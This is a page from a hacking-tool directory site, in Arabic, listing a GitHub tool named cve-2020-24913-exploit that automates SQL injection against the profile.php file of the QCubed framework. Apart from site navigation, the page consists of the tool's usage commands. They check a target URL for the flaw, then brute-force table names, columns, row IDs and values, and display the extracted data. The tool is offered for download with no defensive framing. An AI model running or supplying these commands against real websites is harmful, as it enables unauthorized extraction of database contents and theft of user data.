Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-24913-exploit — حقن SQL آلي لملف profile.php الخاص بـ QCubed | Kitploit
أدوات/GitHubGitHub/shpaw415/cve-2020-24913-exploit
تحليل الثغرات الأمنيةاستغلال تطبيقات الويباختبار الاختراق
GitHubshpaw415/cve-2020-24913-exploit

CVE-2020-24913-exploit

حقن SQL آلي لملف profile.php الخاص بـ QCubed

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

qcubed-exploit

تحتاج إلى تثبيت Bun: https://bun.sh

لتثبيت التبعيات:

root@kitploit:~
bun install

للتشغيل:

root@kitploit:~
# show help
bun run exploit -h

# test for vulnerability
bun run exploit vulnerable -u https://site.com/framework/assets/_core/php/profile.php

# create a session for a new target
bun run exploit create -n your_session_name -u https://site.com/framework/assets/_core/php/profile.php

# brute table
bun run exploit brute-table -n your_session_name -w path/to/wordlist.txt

# show founded tables or column of a table
bun run exploit show-table -n your_session_name
bun run exploit show-column -n your_session_name -t table_name

# brute id
bun run exploit brute-id -n your_session_name -t table_name -i 1

# brute row value
# optionally add -r for resuming the brute forcing from where it stopped
bun run exploit brute-column -n your_session_name -t table_name -c column_name -i 1

# show founded key-value pairs of a table
# optionally `-i id_value` for showing only for a particular id 
bun run exploit show-rows -n your_session_name -t table_name

تنزيل الأداة